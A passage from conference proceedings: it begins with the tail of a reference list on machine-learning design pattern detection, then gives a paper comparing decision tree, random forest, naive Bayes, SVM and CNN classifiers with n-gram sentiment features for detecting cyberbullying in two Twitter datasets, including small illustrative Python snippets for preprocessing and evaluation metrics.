24. Hummel, O., Burger, S.: Analyzing source code for automated design pattern recommendation. In: Proceedings of the 3rd ACM SIGSOFT International Workshop on Software Analytics, SWAN 2017, New York, NY, USA, pp. 8–14. Association for Computing Machinery (2017)
25. Khomh, F., Gueheneuc, Y.G.: Do design patterns impact software quality positively? In: 2008 12th European Conference on Software Maintenance and Reengineering, pp. 274–278 (2008)
26. Kotu, V., Deshpande, B.: Regression methods. In: Kotu, V., Deshpande, B. (eds.) Predictive Analytics and Data Mining, pp. 165–193. Morgan Kaufmann, Boston (2015)
27. Lemaître, G., Nogueira, F., Aridas, C.K.: Imbalanced-learn: a python toolbox to tackle the curse of imbalanced datasets in machine learning. J. Mach. Learn. Res. 18(1), 559–563 (2017)
28. Lou, Y., Caruana, R., Gehrke, J., Hooker, G.: Accurate intelligible models with pairwise interactions. In: Proceedings of the 19th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, pp. 623–631 (2013)
29. Lundberg, S.M., Lee, S.I.: A unified approach to interpreting model predictions. In: Guyon, I., et al. (eds.) Advances in Neural Information Processing Systems, vol. 30, pp. 4765–4774. Curran Associates, Inc. (2017)
30. Martin, R.C.: Design principles and design patterns. Obj. Mentor 1(34), 597 (2000)
31. Nickel, U., Niere, J., Zündorf, A.: The fujaba environment. In: Proceedings of the 22nd International Conference on Software Engineering, pp. 742–745 (2000)
32. Niere, J., Schäfer, W., Wadsack, J.P., Wendehals, L., Welsh, J.: Towards pattern-based design recovery. In: Proceedings of the 24th International Conference on Software Engineering, pp. 338–348 (2002)
33. Nori, H., Jenkins, S., Koch, P., Caruana, R.: Interpretml: a unified framework for machine learning interpretability. arXiv preprint arXiv:1909.09223 (2019)
34. Pedregosa, F., et al.: Scikit-learn: machine learning in python. J. Mach. Learn. Res. 12, 2825–2830 (2011)
35. Ribeiro, M.T., Singh, S., Guestrin, C.: “why should i trust you?” explaining the predictions of any classifier. In: Proceedings of the 22nd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, pp. 1135–1144 (2016)
36. Safavian, R., Landgrebe, D.: A survey of decision tree classifier methodology. IEEE Trans. Syst. Man Cybern. 21(3), 660–674 (1991)
37. Schölkopf, B., Smola, A.J., Williamson, R.C., Bartlett, P.L.: New support vector algorithms. Neural Comput. 12(5), 1207–1245 (2000)
38. Shaw, M., Clements, P.: A field guide to boxology: preliminary classification of architectural styles for software systems. In: Proceedings Twenty-First Annual International Computer Software and Applications Conference (COMPSAC 1997), pp. 6–13 (1997)
39. Shoeb, A.H., Guttag, J.V.: Application of machine learning to epileptic seizure detection. In: ICML (2010)
40. Thaller, H.: Towards Deep Learning Driven Design Pattern Detection/submitted by Hannes Thaller. PhD thesis, Universität Linz (2016)
41. Theodoridis, S.: Bayesian learning: approximate inference and nonparametric models. In: Theodoridis, S. (ed.) Machine Learning, pp. 639–706. Academic Press, Oxford (2015)
42. Theodoridis, S.: Neural networks and deep learning. In: Theodoridis, S. (ed.) Machine Learning, pp. 875–936. Academic Press, Oxford (2015)
43. Tsantalis, N., Chatzigeorgiou, A., Stephanides, G., Halkidis, S.T.: Design pattern detection using similarity scoring. IEEE Trans. Softw. Eng. 32(11), 896–909 (2006)
44. Uchiyama, S., Kubo, A., Washizaki, H., Fukazawa, Y.: Detecting design patterns in object-oriented program source code by using metrics and machine learning. J. Softw. Eng. Appl. 7, 01 (2014)
45. Uchiyama, S., Washizaki, H., Fukazawa, Y., Kubo, A.: Design pattern detection using software metrics and machine learning. In: First International Workshop on Model-Driven Software Migration (MDSM 2011), p. 38 (2011)
46. Worden, K., Manson, G.: The application of machine learning to structural health monitoring. Phil. Trans. Royal Soc. A: Math. Phys. Eng. Sci. 365(1851), 515–537 (2007)
47. Yang, Y., Zheng, K., Chunhua, W., Yang, Y.: Improving the classification effectiveness of intrusion detection by using improved conditional variational autoencoder and deep neural network. Sensors 19(11), 2528 (2019)
48. Yu, D., Ge, J., Wu, W.: Detection of design pattern instances based on graph isomorphism. In: 2013 IEEE 4th International Conference on Software Engineering and Service Science, pp. 874–877 (2013)
49. Zanoni, M., Fontana, F.A., Stella, F.: On applying machine learning techniques for design pattern detection. J. Syst. Softw. 103, 102–117 (2015)
50. Zhang, C., Budgen, D.: What do we know about the effectiveness of software design patterns? IEEE Trans. Softw. Eng. 38(5), 1213–1231 (2012)
51. Zhu, T., Lin, Y., Liu, Y.: Synthetic minority oversampling technique for multiclass imbalance problems. Pattern Recogn. 72, 327–340 (2017)
Detecting Cyberbullying from Tweets Through Machine Learning Techniques with Sentiment Analysis
Jalal Omer Atoum
Department of Computer Science, The University of Texas at Dallas, Dallas, USA
Abstract. Technological advancement has brought with it a serious problem called cyberbullying: bullying someone online, typically by sending ominous or threatening messages. Among social networking sites, Twitter in particular is evolving into a venue for this kind of bullying. Machine learning (ML) algorithms have been widely used to detect cyberbullying by exploiting the particular language patterns that bullies use to attack their victims. Text Sentiment Analysis (SA) can provide beneficial features for identifying harmful or abusive content. The goal of this study is to create and refine an efficient method that utilizes SA and language models to detect cyberbullying from tweets. Various machine learning algorithms are analyzed and compared over two datasets of tweets of different sizes. On both datasets, Convolutional Neural Network classifiers based on higher n-gram language models outperformed the other ML classifiers, namely Decision Trees, Random Forest, Naïve Bayes, and Support-Vector Machines.
Keywords: Cyberbullying detection · Machine learning · Sentiment analysis
1 Introduction
The number of active social media users in the USA in 2022 is about 270 million (81% of the USA's total population), of whom 113 million are Twitter users [1]. As a result, social media has quickly changed how we obtain information and news, shop, etc. in our daily lives. Furthermore, Fig. 1 illustrates that by 2024 there will be over 340 million active Twitter users worldwide [2]. Fig. 2 shows the percentage of active USA Twitter users by age group in August 2022; 38% of adults between the ages of 18 and 29 were active Twitter users at that time [3]. Given how frequently young adults use online media, cyberbullying and other forms of online hostility have proven to be major problems for users of web-based media. As a result, a growing number of victims have suffered physically, mentally, or emotionally.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 25–38, 2023. https://doi.org/10.1007/978-3-031-28073-3_3
Fig. 1. Number of twitter users.
[Figure: bar chart "Statistics of USA Active Twitter Users by Age"; age groups 18-29, 30-49, 50-64 and 65+ on the horizontal axis, percentages from 0% to 40% on the vertical axis]
Fig. 2. Percentage of USA twitter active users by age as of Aug. 2022.
Cyberbullying is a form of provocation that takes place online on social media platforms. Criminals rely on these networks to obtain information and data that enable them to carry out their wrongdoings. In addition, cyberbullying victims have a high propensity for mental and psychiatric disorders, as indicated by the American Academy of Child and Adolescent Psychiatry [4]. In severe cases, suicides have been connected to cyberbullying [5, 6]. The prevalence of the phenomenon is shown in Fig. 3, which displays survey data gathered from student respondents. These details demonstrate the substantial health risk that cyberbullying poses [7]. Consequently, researchers have put considerable effort into identifying methods and tactics to detect and prevent cyberbullying. Monitoring systems for cyberbullying have received a lot of attention recently; their main objective is to quickly find instances of cyberbullying [8]. The key concept of such a framework is the extraction of specific features
Fig. 3. Survey statistics on cyberbullying experiences.
from web-based media communications, followed by the construction of classifiers that identify cyberbullying based on these extracted features. These features may relate to content, emotion, users, and social networks. ML or filtration techniques have been used most frequently in studies on detecting cyberbullying. Filtration techniques detect cyberbullying by finding profane phrases or idioms in texts [9]. Filtration strategies typically make use of ML techniques to create classifiers that can spot cyberbullying using data corpora gathered from social networks like Facebook and Twitter. As an illustration, data were obtained from Formspring and labelled using Amazon Mechanical Turk [10]. Additionally, WEKA [11], a collection of ML tools, was used to test various ML approaches. These approaches failed to discriminate between direct and indirect linguistic harassment [12].
In order to identify potential bullies, Chen [13] suggested a technique to separate hostile language constructions from social media by looking at characteristics associated with the users' writing styles, structures, and specific cyberbullying material. The main technique applied in that study is a lexical syntactic component that was effective and able to distinguish hostile content from communications posted by bullies. Their results revealed a remarkable precision of 98.24% and a recall of 94.34%. An approach for identifying cyberbullying by Nandhini and Sheeba [14] was based on a Naïve Bayes (NB) classifier and data gathered from MySpace; they reported a precision of 91%. An improved NB classifier was used by Romsaiyud et al. [15] to separate cyberbullying terms and group piled samples. Utilizing a corpus from Kongregate, MySpace, and Slashdot, they were able to achieve a precision of 95.79%.
Based on our earlier research [16], which used the Sentiment Analysis (SA) technique to categorize tweets as positive, negative, or neutral cyberbullying, we investigate and evaluate different machine learning classifier models, namely Decision Tree (DT), Naïve Bayes (NB), Random Forest (RF), Support Vector Machine (SVM), and Convolutional Neural Networks (CNN). We conduct this investigation and evaluation by performing various experiments on two different datasets of tweets. In addition, we use some language models (Normalization, Tokenization, Named Entity Recognition (NER), and Stemming) to enhance the classification process.
The context for this research is presented in Sect. 2. The suggested model for sentiment analysis of tweets is presented in Sect. 3. The experiments and findings of the suggested model are presented in Sect. 4. Finally, the conclusions of this study are presented in Sect. 5.
2 Background
Machine Learning (ML), an application of artificial intelligence (AI), enables systems to learn automatically from experience and improve without explicit programming. ML algorithms are usually divided into supervised and unsupervised categories. Supervised ML algorithms use labeled examples and past knowledge to analyze incoming data and predict future events. Starting from the analysis of a known training dataset, the learning algorithm constructs an inferred function to predict output values. Unsupervised ML is used when the input data is unlabeled or uncharacterized. Unsupervised learning studies how systems can infer a function from unlabeled data to describe a hidden structure. Lastly, researchers have applied supervised learning techniques to data discovered via freely accessible corpora [17].
The cyberbullying detection framework consists of two main components, as depicted in Fig. 5: Natural Language Processing (NLP) and Machine Learning (ML). The first stage involves gathering datasets of tweets and preparing them for the machine learning algorithms using natural language processing. The machine learning algorithms are then trained on the processed datasets to find any harassing or bullying remarks in the tweets.
2.1 Natural Language Processing
An actual tweet or text may contain a number of extraneous characters or lines of text. For instance, punctuation or numbers have no bearing on the detection of bullying. We need to clean and prepare the tweets for the detection phase before applying the machine learning techniques to them. In this stage, various processing tasks are performed, such as tokenization, stemming, and the elimination of unnecessary characters including stop words, punctuation, and digits.
Collecting Tweets: To collect the tweets from Twitter, an application was created. For each tweet, the feature words that follow the hashtag (words that indicate whether it is a positive, negative, or neutral cyberbullying tweet) need to be extracted. The extraction of tweets is necessary for the analysis of the feature vector and the selection process (unigrams, bigrams, trigrams, etc.), as well as for the classification of both the training and testing sets of tweets.
Cleaning and Annotations of Tweets: Tweets may include special symbols and characters that cause them to be classified differently from how their authors intended. Therefore, all special symbols, letters, and emoticons must be removed from the collected tweets. Also crucial to the classification process is the replacement of such special symbols and emoticons with their meanings. Figure 4 lists several special symbols we have used together with their meanings and sentiments. The collected tweets are annotated manually. As a result of this annotation, each tweet is given a cyberbullying label: positive, negative, or neutral.
Normalization: All non-standard words that contain dates or numerals are listed and mapped to terms in a built-in vocabulary. As a result, the tweet vocabulary is smaller and the classification process is more precise. While testing tweet collections, tweet extraction is necessary.
Tokenization: Tokenization, which reduces the typographical variation of words, is a crucial stage in SA. Tokenization is necessary for both the feature extraction procedure and the bag of words. Words are converted into feature vectors or feature indices using a dictionary of features, and their index in the vocabulary is linked to their frequency over the entire training corpus.
Named Entity Recognition (NER): Named Entity Recognition (NER) can be used to find the proper nouns in an unstructured text. The three types of named entities in NER are ENAMEX (person, organization, and country), TIMEX (date and time), and NUMEX (percentages and numbers).
Removing Stop Words: Some stop words can help convey a tweet's entire meaning, while others are merely superfluous and should be deleted. Stop words like “a”, “and”, “but”, “how”, “or”, and “what” are a few examples. These stop words do not change a tweet's meaning and can be omitted.
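The cleaning, tokenization and stop-word steps described above can be sketched in plain Python as follows. This is only an illustration under stated assumptions: the emoticon table is hypothetical (the actual symbols and meanings are those of Fig. 4), the stop-word list contains only the examples named in the text, and the regular expressions are one possible choice rather than the rules used in the study.

```python
import re

# Hypothetical emoticon meanings; the real mapping is the one listed in Fig. 4.
EMOTICONS = {":)": "happy", ":(": "sad"}
# Only the example stop words named in the text.
STOP_WORDS = {"a", "and", "but", "how", "or", "what"}


def preprocess(tweet):
    """Clean a tweet and return its lower-cased tokens without stop words."""
    text = tweet.lower()
    text = re.sub(r"https?://\S+", " ", text)   # drop URLs
    text = re.sub(r"@\w+", " ", text)           # drop user mentions
    for symbol, meaning in EMOTICONS.items():   # replace emoticons by meaning
        text = text.replace(symbol, f" {meaning} ")
    text = re.sub(r"[^a-z\s]", " ", text)       # drop digits, punctuation, '#'
    tokens = text.split()                       # whitespace tokenization
    return [t for t in tokens if t not in STOP_WORDS]


tokens = preprocess("@bob What a loser!!! :( http://t.co/x1 #fail 2022")
print(tokens)
```

Emoticons are replaced before punctuation is stripped, since otherwise their characters would be removed and their sentiment lost.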
Stemming: When stemming tweets, words are stripped of any suffixes, prefixes, and/or infixes that may have been added. A stemmed word conveys a more general meaning than the original word and may also result in storage savings [18]. Stemmed tweets are reduced to the stems, bases, or roots of any derived or inflected words. Additionally, stemming helps to combine all of a word's variations into a single bucket, effectively reducing entropy and providing better concepts for the data. The N-gram is a traditional technique that can detect formal phrases by looking at the frequency of sequences of N words in a tweet [19]; hence, we employed N-grams in our SA. Weka [11] was used in this study for stemming and to implement the term (word) frequency. Term frequency assigns a weight to each term in a document based on how many times the term appears in the document. It gives more weight to the keywords that appear more frequently in tweets, because these terms indicate words and linguistic patterns that are more frequently used by tweeters.
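As an illustration of the N-gram and term-frequency ideas described above, the following plain-Python sketch extracts n-grams from tokenized tweets and counts how often each occurs per tweet. It does not reproduce the Weka configuration used in the study; the function names and the two example tweets are assumptions made for the example.

```python
from collections import Counter


def ngrams(tokens, n):
    """Return the n-grams of a token list as tuples of n consecutive tokens."""
    return [tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1)]


def term_frequency(documents, n=1):
    """Count, for each tokenized document, how often each n-gram occurs."""
    return [Counter(ngrams(doc, n)) for doc in documents]


# Hypothetical tokenized tweets, for illustration only.
docs = [["you", "are", "so", "dumb"], ["you", "are", "so", "so", "kind"]]
unigram_tf = term_frequency(docs, n=1)
bigram_tf = term_frequency(docs, n=2)
```

A tweet with fewer than n tokens simply yields no n-grams, so very short tweets contribute nothing to the higher-order models.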
Fig. 4. Some special tweets symbols and their meanings.
Feature Selection: Techniques for feature selection have been effectively applied in SA [20]. Features are ranked according to certain criteria, and unhelpful or uninformative features are eliminated to increase the precision and effectiveness of the classification process. To exclude such unimportant features in this investigation, we applied the Chi-square and information gain strategies.
Sentiment Analysis: Sentiment analysis (SA) classifiers are often based on predicted classes and polarity, as well as the level of categorization (sentence or document). Semantic orientation polarity and strength are annotated via lexicon-based SA text extraction. SA has demonstrated how useful light stemming is for classification performance and accuracy [21].
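The Chi-square criterion mentioned under Feature Selection can be illustrated with the usual 2x2 contingency-table statistic for a term and a class. The sketch below is plain Python under stated assumptions: the function name, the tiny labelled corpus and the class names are hypothetical, and the study's exact ranking procedure is not described in the text.

```python
def chi_square(docs, labels, term, target):
    """Chi-square statistic of `term` with respect to class `target`.

    a: documents of the class containing the term
    b: documents of other classes containing the term
    c: documents of the class without the term
    d: documents of other classes without the term
    """
    a = b = c = d = 0
    for tokens, label in zip(docs, labels):
        has_term = term in tokens
        in_class = label == target
        if has_term and in_class:
            a += 1
        elif has_term:
            b += 1
        elif in_class:
            c += 1
        else:
            d += 1
    n = a + b + c + d
    denom = (a + c) * (b + d) * (a + b) * (c + d)
    return 0.0 if denom == 0 else n * (a * d - c * b) ** 2 / denom


# Hypothetical tokenized tweets and labels, for illustration only.
docs = [{"idiot", "you"}, {"idiot", "shut"}, {"nice", "you"}, {"thanks", "you"}]
labels = ["bully", "bully", "ok", "ok"]
score_idiot = chi_square(docs, labels, "idiot", "bully")
score_you = chi_square(docs, labels, "you", "bully")
```

Terms would then be ranked by this score and the lowest-ranked ones dropped; in the toy corpus, "idiot" scores higher than "you" because it occurs only in the "bully" class.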
2.2 Machine Learning Algorithms
The machine learning algorithms used in this study to build classifier models that detect cyberbullying from tweets are explained in this subsection.
Decision Trees: Classification can be done using the Decision Tree (DT) classifier [22]. It can both assist in making a decision and represent that decision. In a decision tree, each leaf node denotes a decision, and each internal node denotes a condition. A classification tree returns the class to which the target belongs. A regression tree produces the predicted value for a particular input.
Random Forest: The Random Forest (RF) classifier [23] is made up of multiple decision tree classifiers. Each tree provides its own class prediction, and the final result is the class predicted by the largest number of trees. This classifier is a supervised learning model that yields accurate results because the output is created by combining numerous decision trees. Instead of relying on a single decision tree, the random forest takes the predictions of every tree and selects the outcome by majority vote. For instance, given two classes A and B, if most of the decision trees predict the class label B for an instance, then RF will choose the class label B: f(x) = majority vote of all trees = B.
Naive Bayes: Naive Bayes (NB) classifiers are a family of simple “probabilistic classifiers” based on applying Bayes' theorem with strong (naive) independence assumptions between the features. NB classifiers are used as supervised learning models. When representing a document, NB frequently uses the “bag of words” method, gathering the most frequently used terms while ignoring less frequently used ones. The feature extraction approach depends on the bag of words to classify the data. Additionally, NB contains a language modeling feature that separates each text into representations of unigrams, bigrams, or n-grams and assesses the likelihood that a given query will match a certain document [24].
Support-Vector Machine (SVM): The SVM is another supervised learning model, with an associated learning algorithm that analyzes data for classification and regression. Given a set of training examples, each marked as belonging to one of two categories, an SVM training algorithm builds a model that assigns new examples to one category or the other, making it a non-probabilistic binary linear classifier (although there are ways to apply SVM in a probabilistic classification setting, such as Platt scaling) [25]. Linear and Radial Basis Function models are crucial for SVM text categorization. The dataset is often trained for linear classification before a classification or categorization model is created. The features are represented as points in space that are predicted to belong to one of the designated classes. SVM performs well in a variety of classification tasks, but it is most frequently used for text and image recognition [25].
Convolutional Neural Network (CNN): A neural network is a software solution that uses algorithms to imitate the functions of the human brain. In comparison to conventional computers, neural networks process data more quickly and have better abilities for pattern detection and problem-solving. Neural network techniques have generally surpassed a number of contemporary techniques in machine translation, image recognition, and speech recognition. It is possible that they will also perform better than other methods in developing classifiers for the identification of cyberbullying, because neural networks can automatically learn useful features of complex structures from a high-dimensional input set [26]. Shallow classifiers are routinely outperformed by two specific neural network architectures, namely Recurrent Neural Networks (RNN) and Convolutional Neural Networks (CNN) [27, 28]. RNNs process their input one element at a time, such as a word or character, and store in their hidden units a state vector that contains the history of previous elements. Conversely, a CNN employs convolutions to identify smaller conjunctions of features from a previous layer and create new feature maps that can be used as input by many layers for classification.
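The majority-vote rule of the Random Forest classifier described above can be written in a few lines of plain Python. This sketch covers only the voting step, not the training of the trees; the list of votes is a hypothetical example.

```python
from collections import Counter


def majority_vote(tree_predictions):
    """Return the class label predicted by the largest number of trees.

    On a tie, the label that reached the top count first in the list wins.
    """
    return Counter(tree_predictions).most_common(1)[0][0]


# Hypothetical predictions of five trees for one tweet, classes A and B.
votes = ["B", "A", "B", "B", "A"]
forest_prediction = majority_vote(votes)
```

Using an odd number of trees avoids ties in the two-class case.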
A CNN sentence-level classifier has been developed by Kim et al. [29] using pretrained word vectors. The results showed an improvement over the state-of-the-art on four out of seven benchmark datasets that incorporate sentiment analysis. Using an unsupervised corpus of 50 million tweets with word embeddings, Severyn and Moschitti [30] presented a pre-trained CNN architecture. The findings showed that it would place first on the phrase-level task of the Twitter15 dataset of SemEval 2015. The Very Deep CNN classifier was created by Conneau et al. [31]; by using up to 29 convolutional layers, it improved performance on eight publicly available text classification tasks, including sentiment analysis, subject classification, and news categorization.
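To illustrate how a convolution over word vectors produces a feature map, the sketch below slides a single kernel spanning two consecutive words over a short sequence of word vectors, applies a ReLU and keeps the maximum response. It is plain Python with hypothetical 2-dimensional embeddings and a hand-picked kernel; the ReLU and the max-over-time pooling are assumptions commonly made for sentence-level CNNs, and the block is not the architecture evaluated in this paper.

```python
def conv1d_max(embeddings, kernel, bias=0.0):
    """Apply one convolution kernel over consecutive word vectors.

    `kernel` has one row per word in the window; the sequence is assumed
    to contain at least as many words as the kernel has rows.
    Returns the max-pooled value and the full feature map.
    """
    width = len(kernel)  # number of consecutive words covered by the kernel
    feature_map = []
    for start in range(len(embeddings) - width + 1):
        window = embeddings[start:start + width]
        total = bias + sum(w * x
                           for k_row, e_row in zip(kernel, window)
                           for w, x in zip(k_row, e_row))
        feature_map.append(max(0.0, total))  # ReLU
    return max(feature_map), feature_map


# Hypothetical 2-dimensional embeddings of a four-word tweet.
embeddings = [[1.0, 0.0], [0.0, 1.0], [1.0, 1.0], [0.0, 0.0]]
# Hypothetical kernel spanning two words, comparable to a bigram window.
kernel = [[1.0, 0.0], [0.0, 1.0]]
pooled, feature_map = conv1d_max(embeddings, kernel)
```

A kernel covering n consecutive words plays a role comparable to an n-gram feature, which is one way to read the link between higher n-gram models and CNN classifiers made in the abstract.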
3 Proposed Tweets SA Model
The suggested Twitter bullying detection model, shown in Fig. 5, employs various stages for analyzing, mining, and categorizing tweets. In order to improve the SA process, the gathered tweets must go through a number of preprocessing steps, as discussed in the preceding section. We used five machine learning algorithms, namely Decision Tree (DT), Random Forest (RF), Naive Bayes (NB), Support Vector Machines (SVM), and Convolutional Neural Networks (CNN), to classify tweets as bullying or non-bullying.
3.1 Evaluation Measures
Several evaluation measures were used in this work to assess the effectiveness of the proposed classifier models in differentiating cyberbullying from non-cyberbullying. Five performance metrics have been used in this study: accuracy, precision, recall, F-measure, and receiver operating characteristic (ROC). These measures are defined as follows:
Accuracy: The fraction of correct predictions over all predictions.
Precision: The number of true positives divided by the number of all cases classified as positive (true positives plus false positives).
Recall (or Sensitivity): The number of true positives divided by the number of all actual positive cases (true positives plus false negatives).
F-Measure: The harmonic mean of precision and recall, given by (2 * Precision * Recall)/(Precision + Recall).
Receiver Operating Characteristic (ROC): A curve on which recall (also known as the true positive rate) is plotted against the false-positive rate. The area under the ROC curve (AUC) measures the entire area beneath the curve. The higher the AUC, the better the classification model.
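The evaluation measures defined above can be computed from true labels, predicted labels and prediction scores as in the following plain-Python sketch. The function names and the example data are assumptions; the AUC is computed through its rank interpretation (the probability that a randomly chosen positive case receives a higher score than a randomly chosen negative one), which equals the area under the ROC curve.

```python
def binary_metrics(y_true, y_pred, positive=1):
    """Accuracy, precision, recall and F-measure for a two-class problem."""
    pairs = list(zip(y_true, y_pred))
    tp = sum(1 for t, p in pairs if t == positive and p == positive)
    fp = sum(1 for t, p in pairs if t != positive and p == positive)
    fn = sum(1 for t, p in pairs if t == positive and p != positive)
    tn = len(pairs) - tp - fp - fn
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    f_measure = (2 * precision * recall / (precision + recall)
                 if precision + recall else 0.0)
    return {"accuracy": (tp + tn) / len(pairs), "precision": precision,
            "recall": recall, "f_measure": f_measure}


def roc_auc(y_true, scores, positive=1):
    """AUC as the share of (positive, negative) pairs ranked correctly."""
    pos = [s for t, s in zip(y_true, scores) if t == positive]
    neg = [s for t, s in zip(y_true, scores) if t != positive]
    wins = sum(1.0 if p > n else 0.5 if p == n else 0.0
               for p in pos for n in neg)
    return wins / (len(pos) * len(neg))


# Hypothetical labels (1 = cyberbullying) and classifier scores.
y_true = [1, 1, 1, 0, 0, 0, 0, 0]
y_pred = [1, 1, 0, 0, 0, 0, 1, 0]
scores = [0.9, 0.8, 0.4, 0.3, 0.2, 0.1, 0.7, 0.35]
metrics = binary_metrics(y_true, y_pred)
auc = roc_auc(y_true, scores)
```

The pairwise AUC computation is quadratic in the number of samples, which is acceptable for a small illustration but not for large test sets.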
Detecting Cyberbullying from Tweets Through Machine Learning
Fig. 5. Proposed twitter bullying detection model.
3.2 Datasets
To evaluate the effectiveness of the machine learning methods used in this investigation, we gathered two datasets (Dataset-1 and Dataset-2) from Twitter on different dates (one month apart). Table 1 presents the details of these two datasets.
Table 1. Datasets tweets statistics
| | Dataset-1 | Dataset-2 |
|---|---|---|
| Number of tweets | 9352 | 6438 |
| Number of supportive (cyberbullying) tweets | 2521 | 1374 |
| Number of unfavorable (non-cyberbullying) tweets | 3942 | 2347 |
| Number of impartial tweets | 2889 | 2717 |
4 Experiments and Results
Before we could conduct our experiments, the collected tweets had to go through a number of steps, including cleaning, preprocessing, normalization, tokenization, named entity recognition, stemming, and feature selection, as covered in the prior section. The DT, RF, NB, SVM, and CNN classifiers are then trained and tested on this data using a 70/30 split. Finally, 10-fold cross-validation is applied, with the data divided into ten equal-sized folds.
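The evaluation protocol above can be sketched in plain Python as follows. This is only an illustration under stated assumptions: the paper does not say how the 70/30 split and the 10-fold cross-validation were combined or which tooling was used, and the helper names `train_test_split` and `k_fold_indices` as well as the placeholder tweets are hypothetical.

```python
import random


def train_test_split(items, train_ratio=0.7, seed=0):
    """Shuffle the items and split them into training and test parts."""
    shuffled = list(items)
    random.Random(seed).shuffle(shuffled)
    cut = int(round(len(shuffled) * train_ratio))
    return shuffled[:cut], shuffled[cut:]


def k_fold_indices(n_items, k=10):
    """Yield (train_idx, test_idx) pairs for k nearly equal-sized folds."""
    fold_sizes = [n_items // k + (1 if i < n_items % k else 0) for i in range(k)]
    start = 0
    for size in fold_sizes:
        test_idx = list(range(start, start + size))
        train_idx = list(range(0, start)) + list(range(start + size, n_items))
        yield train_idx, test_idx
        start += size


# Placeholder data standing in for preprocessed tweets.
tweets = [f"tweet {i}" for i in range(100)]
train, test = train_test_split(tweets)
folds = list(k_fold_indices(len(tweets), k=10))
```

Each tweet index appears in exactly one test fold, so every example is used for testing once across the ten rounds.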
J. O. Atoum
Numerous experiments were carried out on the two datasets of collected tweets described above to analyze and evaluate the DT, RF, NB, SVM, and CNN classifiers. The precision, accuracy, recall, F-measure, and ROC of these classifiers were assessed using tweets with n-gram sizes of 2, 3, and 4 in the main test.
4.1 Results for Dataset-1
The outcomes of the evaluation measures on Dataset-1 are shown in Fig. 6. It highlights the average estimates obtained using several n-gram models for the DT, RF, NB, SVM, and CNN classifiers. This graph shows that the CNN classifiers outperformed all other classifiers in all n-gram language models in terms of precision, accuracy, recall, F-measure, and ROC. For instance, with the 4-gram language model the CNN classifiers obtained an average accuracy of 93.62%, whereas the DT, RF, NB, and SVM classifiers achieved average accuracies of only 63.2%, 65.9%, 82.3%, and 91.02%, respectively, using the same language model. Additionally, in all tests with all classifiers, the 4-gram language model outperformed the remaining n-gram language models. This is attributed to the fact that a larger n-gram size increases the likelihood of a correct evaluation.
[Figure 6: bar chart (y-axis 0 to 100) of Accuracy, Precision, Recall, and F-Measure for DT, RF, NB, SVM, and CNN under the 2-gram, 3-gram, and 4-gram models.]
Fig. 6. Comparisons of DT, RF, NB, SVM, and CNN measures for dataset-1.
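To make the 2-gram, 3-gram, and 4-gram language models concrete, the sketch below extracts word-level n-grams from a tokenized tweet. It assumes word-level n-grams and simple whitespace tokenization, which the text does not specify; the function name `word_ngrams` and the example sentence are hypothetical.

```python
def word_ngrams(text, n):
    """Return the list of word-level n-grams of a text (whitespace tokens)."""
    tokens = text.lower().split()
    return [" ".join(tokens[i:i + n]) for i in range(len(tokens) - n + 1)]


example = "nobody likes you at school"
bigrams = word_ngrams(example, 2)
fourgrams = word_ngrams(example, 4)
print(bigrams)
print(fourgrams)
```

A larger n keeps more of the surrounding context in each feature, at the cost of fewer and sparser features per tweet.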
4.2 Results for Dataset-2
Figure 7 displays the results of the same evaluation measures on Dataset-2 using the various n-gram models. This figure again shows that the CNN classifiers outperform all other classifiers in terms of precision, accuracy, recall, F-measure, and ROC in all n-gram language models. With the 4-gram language model, CNN achieved an average accuracy of 91.03%, whereas the DT, RF, NB, and SVM classifiers reached average accuracies of only 62.7%, 64.8%, 81.2%, and 89.7%, respectively, using the same language model. Additionally, in all tests conducted with all classifiers (DT, RF, NB, SVM, and CNN), the 4-gram language model fared better than all other n-gram language models.
4.3 Comparing the Results of Dataset-1 and Dataset-2
As can be seen from Fig. 8, when the findings from the two datasets (Dataset-1 and Dataset-2) are compared, Dataset-1 yields slightly better results than Dataset-2 for all assessment measures (using the averages over all language models: 2-gram, 3-gram, and 4-gram). We attribute this to the fact that Dataset-1 has more tweets (9352) than Dataset-2 (6438). This suggests that increasing the size of the dataset used to train and evaluate the machine learning classifiers improves the results. Additionally, all ML classifiers perform better with the 4-gram language model than with the 2-gram and 3-gram models on all assessment criteria, as shown in Fig. 6 and Fig. 7. This is attributed to the fact that a larger n-gram size increases the likelihood of a correct evaluation.
[Figure 7: bar chart (y-axis 0 to 100) of Accuracy, Precision, Recall, F-Measure, and ROC for DT, RF, NB, SVM, and CNN under the 2-gram, 3-gram, and 4-gram models.]
Fig. 7. Comparisons of DT, RF, NB, SVM, and CNN measures for dataset-2.
[Figure 8: bar chart (y-axis 0 to 100) of Accuracy, Precision, Recall, F-Measure, and ROC for DT, RF, NB, SVM, and CNN on Dataset-1 and Dataset-2.]
Fig. 8. Comparisons of evaluation measures of dataset-1 and dataset-2.
5 Conclusion
We have proposed a method for detecting cyberbullying on Twitter that relies on Sentiment Analysis using machine learning techniques, notably Decision Tree (DT), Naive Bayes (NB), Random Forest (RF), Support Vector Machine (SVM), and Convolutional Neural Networks (CNN). The two collections of tweets used in this study contain a variety of tweets that have been categorized with respect to cyberbullying in one of three ways: positive, negative, or neutral. Before being used to train and test these machine learning algorithms, the collected sets of tweets had to go through a number of stages: cleaning, annotation, normalization, tokenization, named entity recognition, stop-word removal, stemming, n-gram extraction, and feature selection. According to the results of the conducted experiments, the CNN classifiers performed better than all other classifiers on both datasets and across all language models (2-gram, 3-gram, and 4-gram). On Dataset-1 and Dataset-2, the CNN classifiers achieved average accuracies of 93.62% and 91.03%, respectively. The CNN classifiers also did better than every other classifier (DT, RF, NB, and SVM) on every other evaluation metric (precision, recall, F-measure, and ROC). Additionally, with the 4-gram language model these classifiers produced better results than with the other language models (2-gram and 3-gram). Finally, as future work on cyberbullying detection, we intend to investigate machine learning techniques for identifying bullying on other social media sites such as Facebook, Instagram, and TikTok.
Acknowledgment. I want to express my gratitude to the University of Texas at Dallas for their assistance.
References
1. US Social Media Statistics | US Internet Mobil Stats. https://www.theglobalstatistics.com/united-states-social-media-statistics/. Accessed 05 Aug 2022
2. Cyberbullying Research Center. http://cyberbullying.org/
3. The 2022 Social Media Demographics Guide. https://khoros.com/resources/social-media-demographics-guide
